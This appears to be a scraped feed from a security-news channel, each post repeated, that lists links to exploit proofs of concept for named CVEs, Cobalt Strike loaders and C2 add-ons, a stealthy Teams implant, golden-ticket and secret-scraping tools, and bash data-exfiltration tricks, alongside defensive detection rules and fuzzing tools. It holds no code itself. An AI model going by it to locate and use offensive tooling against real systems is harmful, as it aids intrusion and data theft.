#exploit
1. CVE-2022-25375:
Demo exploit of RNDIS USB Gadget
https://github.com/szymonh/rndis-co
2. CVE-2022-24112:
Apache APISIX apisix/batch-requests RCE
https://github.com/Mr-xn/CVE-2022-24112
]-> https://github.com/shakeman8/CVE-2022-24112
@BlueRedTeam
1. CVE-2022-25375:
Demo exploit of RNDIS USB Gadget
https://github.com/szymonh/rndis-co
2. CVE-2022-24112:
Apache APISIX apisix/batch-requests RCE
https://github.com/Mr-xn/CVE-2022-24112
]-> https://github.com/shakeman8/CVE-2022-24112
@BlueRedTeam
GitHub
GitHub - szymonh/rndis-co: CVE-2022-25375 - Demo exploit of RNDIS USB Gadget
CVE-2022-25375 - Demo exploit of RNDIS USB Gadget. Contribute to szymonh/rndis-co development by creating an account on GitHub.
#Red_Team
Bash Tricks for Command Execution and Data Extraction over HTTP/S
https://medium.com/maverislabs/bash-tricks-for-command-execution-and-data-extraction-over-http-s-ca76e9c80933
@BlueRedTeam
Bash Tricks for Command Execution and Data Extraction over HTTP/S
https://medium.com/maverislabs/bash-tricks-for-command-execution-and-data-extraction-over-http-s-ca76e9c80933
@BlueRedTeam
Medium
Bash Tricks for Command Execution and Data Extraction over HTTP/S
This post is part of a series on data extraction techniques on Linux Systems, if you like what you read here, be sure to stay tuned for…
#Malware
New Sandworm malware Cyclops Blink replaces VPNFilter
https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter
@BlueRedTeam
New Sandworm malware Cyclops Blink replaces VPNFilter
https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter
@BlueRedTeam
www.ncsc.gov.uk
New Sandworm malware Cyclops Blink replaces VPNFilter
The Sandworm actor has replaced the exposed VPNFilter malware with a new more advanced framework.
Anti_backdoor.pdf
12.6 MB
#Blue_Team
"Anti-Backdoor Learning:
Training Clean Models on Poisoned Data", 2021.
]-> Repo: https://github.com/bboylyg/ABL
@BlueRedTeam
"Anti-Backdoor Learning:
Training Clean Models on Poisoned Data", 2021.
]-> Repo: https://github.com/bboylyg/ABL
@BlueRedTeam
#exploit
1. Exploit Development:
ASLR - Coming To A KUSER_SHARED_DATA Structure
https://connormcgarr.github.io/kuser-shared-data-changes-win-11
2. LPE based on Sunflower RCE without specifying ports
https://github.com/Ryze-T/CNVD-2022-10270-LPE
@BlueRedTeam
1. Exploit Development:
ASLR - Coming To A KUSER_SHARED_DATA Structure
https://connormcgarr.github.io/kuser-shared-data-changes-win-11
2. LPE based on Sunflower RCE without specifying ports
https://github.com/Ryze-T/CNVD-2022-10270-LPE
@BlueRedTeam
Connor McGarr’s Blog
Exploit Development: ASLR - Coming To A KUSER_SHARED_DATA Structure Near You!
Examining recent changes to a highly-abused static structure, KUSER_SHARED_DATA, and its exploitation impact.
#Cobalt_Strike
Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus
https://github.com/Cobalt-Strike/community_kit
@BlueRedTeam
Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus
https://github.com/Cobalt-Strike/community_kit
@BlueRedTeam
GitHub
GitHub - Cobalt-Strike/community_kit: Cobalt Strike is a post-exploitation framework designed to be extended and customized by…
Cobalt Strike is a post-exploitation framework designed to be extended and customized by the user community. Several excellent tools and noscripts have been written and published, but they can be cha...
#Red_Team
1. Smuggling HTTP requests over fake WebSocket connection
https://github.com/0ang3el/websocket-smuggle
2. JNDI-Injection-Exploit - A Tool Which Generates JNDI Links Can Start Several Servers To Exploit JNDI Injection Vulnerability
https://github.com/welk1n/JNDI-Injection-Exploit
3. TeamsImplant: is a stealthy teams implant that proxies the urlmon.dll
https://github.com/Allevon412/TeamsImplant
@BlueRedTeam
1. Smuggling HTTP requests over fake WebSocket connection
https://github.com/0ang3el/websocket-smuggle
2. JNDI-Injection-Exploit - A Tool Which Generates JNDI Links Can Start Several Servers To Exploit JNDI Injection Vulnerability
https://github.com/welk1n/JNDI-Injection-Exploit
3. TeamsImplant: is a stealthy teams implant that proxies the urlmon.dll
https://github.com/Allevon412/TeamsImplant
@BlueRedTeam
GitHub
GitHub - 0ang3el/websocket-smuggle: Issues with WebSocket reverse proxying allowing to smuggle HTTP requests
Issues with WebSocket reverse proxying allowing to smuggle HTTP requests - 0ang3el/websocket-smuggle
#Cobalt_Strike
Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.
https://github.com/boku7/BokuLoader
@BlueRedTeam
Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.
https://github.com/boku7/BokuLoader
@BlueRedTeam
GitHub
GitHub - boku7/BokuLoader: A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate, integrate, and enhance Cobalt…
A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate, integrate, and enhance Cobalt Strike's evasion features! - boku7/BokuLoader
#Blue_Team
1. Hermetic Wiper Malware Detection Rules
https://github.com/stripesoc/detections/tree/main/hermeticwiper
2. CVE-2021-31166 Detection Rules
https://github.com/mvlnetdev/CVE-2021-31166-detection-rules
@BlueRedTeam
1. Hermetic Wiper Malware Detection Rules
https://github.com/stripesoc/detections/tree/main/hermeticwiper
2. CVE-2021-31166 Detection Rules
https://github.com/mvlnetdev/CVE-2021-31166-detection-rules
@BlueRedTeam
GitHub
detections/hermeticwiper at main · stripesoc/detections
KQL detection rules. Contribute to stripesoc/detections development by creating an account on GitHub.
#exploit
1. CVE-2022-21974:
Roaming Security Rights Management Services
Remote Code Execution Vulnerability
https://github.com/0vercl0k/CVE-2022-21974
2. CVE-2022-21971:
Windows Runtime RCE Vulnerability
https://github.com/0vercl0k/CVE-2022-21971
@BlueRedTeam
1. CVE-2022-21974:
Roaming Security Rights Management Services
Remote Code Execution Vulnerability
https://github.com/0vercl0k/CVE-2022-21974
2. CVE-2022-21971:
Windows Runtime RCE Vulnerability
https://github.com/0vercl0k/CVE-2022-21971
@BlueRedTeam
GitHub
GitHub - 0vercl0k/CVE-2022-21974: PoC for CVE-2022-21974 "Roaming Security Rights Management Services Remote Code Execution Vulnerability"
PoC for CVE-2022-21974 "Roaming Security Rights Management Services Remote Code Execution Vulnerability" - 0vercl0k/CVE-2022-21974
#tools
Fuzzing Network Applications with AFL and libdesock
https://lolcads.github.io/posts/2022/02/libdesock
]-> A de-socketing library for fuzzing:
https://github.com/fkie-cad/libdesock
@BlueRedTeam
Fuzzing Network Applications with AFL and libdesock
https://lolcads.github.io/posts/2022/02/libdesock
]-> A de-socketing library for fuzzing:
https://github.com/fkie-cad/libdesock
@BlueRedTeam
lolcads tech blog
libdesock
Fuzzing Network Applications with AFL and libdesock Fuzzing network servers with AFL is challenging since AFL provides its input via stdin or command line arguments while servers get their input over network connections. As the popularity of AFL grew, many…
#tools
#Red_Team
1. Copy the properties and groups of a user from neo4j (bloodhound) to create an identical golden ticket
https://github.com/Dramelac/GoldenCopy
2. Jbin Website Secret Scraper will gather all the URLs from the website and then it will try to expose the secret data from them such as API keys, secrets, tokens and many other juicy information
https://github.com/h33tlit/Jbin-website-secret-scraper
@BlueRedTeam
#Red_Team
1. Copy the properties and groups of a user from neo4j (bloodhound) to create an identical golden ticket
https://github.com/Dramelac/GoldenCopy
2. Jbin Website Secret Scraper will gather all the URLs from the website and then it will try to expose the secret data from them such as API keys, secrets, tokens and many other juicy information
https://github.com/h33tlit/Jbin-website-secret-scraper
@BlueRedTeam
GitHub
GitHub - Dramelac/GoldenCopy: Copy the properties and groups of a user from neo4j (bloodhound) to create an identical golden ticket.
Copy the properties and groups of a user from neo4j (bloodhound) to create an identical golden ticket. - Dramelac/GoldenCopy
#Blue_Team
HTTP Desync Attacks:
Request Smuggling Reborn
https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
]-> Http request smuggling vulnerability scanner:
https://github.com/Sh1Yo/request_smuggler
@BlueRedTeam
HTTP Desync Attacks:
Request Smuggling Reborn
https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
]-> Http request smuggling vulnerability scanner:
https://github.com/Sh1Yo/request_smuggler
@BlueRedTeam
#Red_Team
Into the art of Binary Exploitation
Part 4 - Reviving of Satanic-ROP
https://infosecwriteups.com/into-the-art-of-binary-exploitation-0x000004-reviving-of-satanic-rop-5ab604b52341
@BlueRedTeam
Into the art of Binary Exploitation
Part 4 - Reviving of Satanic-ROP
https://infosecwriteups.com/into-the-art-of-binary-exploitation-0x000004-reviving-of-satanic-rop-5ab604b52341
@BlueRedTeam
Medium
Into the art of Binary Exploitation 0x000004[Reviving of Satanic-ROP]
Continuation of sorcery…!!
#exploit
1. CVE-2021-30955:
Apple macOS Kernel Race Condition
https://gist.github.com/jakeajames/37f72c58c775bfbdda3aa9575149a8aa
2. CVE-2021-3489:
Exploitation Analysis of Linux Kernel eBPF RINGBUF Out-of-Bounds Access Vulnerability
https://mp.weixin.qq.com/s/biSNUlzZqqcYiYwfMSaTeg
@BlueRedTeam
1. CVE-2021-30955:
Apple macOS Kernel Race Condition
https://gist.github.com/jakeajames/37f72c58c775bfbdda3aa9575149a8aa
2. CVE-2021-3489:
Exploitation Analysis of Linux Kernel eBPF RINGBUF Out-of-Bounds Access Vulnerability
https://mp.weixin.qq.com/s/biSNUlzZqqcYiYwfMSaTeg
@BlueRedTeam
Gist
CVE-2021-30955 PoC
CVE-2021-30955 PoC. GitHub Gist: instantly share code, notes, and snippets.
#Blue_Team
1. The SpotBugs plugin for security audits of Java web applications and Android applications (also work with Kotlin/Groovy/Scala projects)
https://github.com/find-sec-bugs/find-sec-bugs
2. SOC Skills:
How to Detect Good Apps Gone Bad
https://www.intezer.com/blog/malware-analysis/how-to-detect-legitimate-apps-used-by-attackers
@BlueRedTeam
1. The SpotBugs plugin for security audits of Java web applications and Android applications (also work with Kotlin/Groovy/Scala projects)
https://github.com/find-sec-bugs/find-sec-bugs
2. SOC Skills:
How to Detect Good Apps Gone Bad
https://www.intezer.com/blog/malware-analysis/how-to-detect-legitimate-apps-used-by-attackers
@BlueRedTeam
GitHub
GitHub - find-sec-bugs/find-sec-bugs: The SpotBugs plugin for security audits of Java web applications and Android applications.…
The SpotBugs plugin for security audits of Java web applications and Android applications. (Also work with Kotlin, Groovy and Scala projects) - find-sec-bugs/find-sec-bugs
#Red_Team
1. Golden GMSA Attack
https://www.semperis.com/blog/golden-gmsa-attack
2. Bash Tricks for File Exfiltration over HTTP/S using Flask
https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad
@BlueRedTeam
1. Golden GMSA Attack
https://www.semperis.com/blog/golden-gmsa-attack
2. Bash Tricks for File Exfiltration over HTTP/S using Flask
https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad
@BlueRedTeam
Semperis
gMSA Active Directory Attacks | Semperis AD Guides
Group Managed Service Accounts (gMSAs) are vulverable to attacks called a "Golden gMSA". Learn more about GMSA Active Directory attacks on our blog.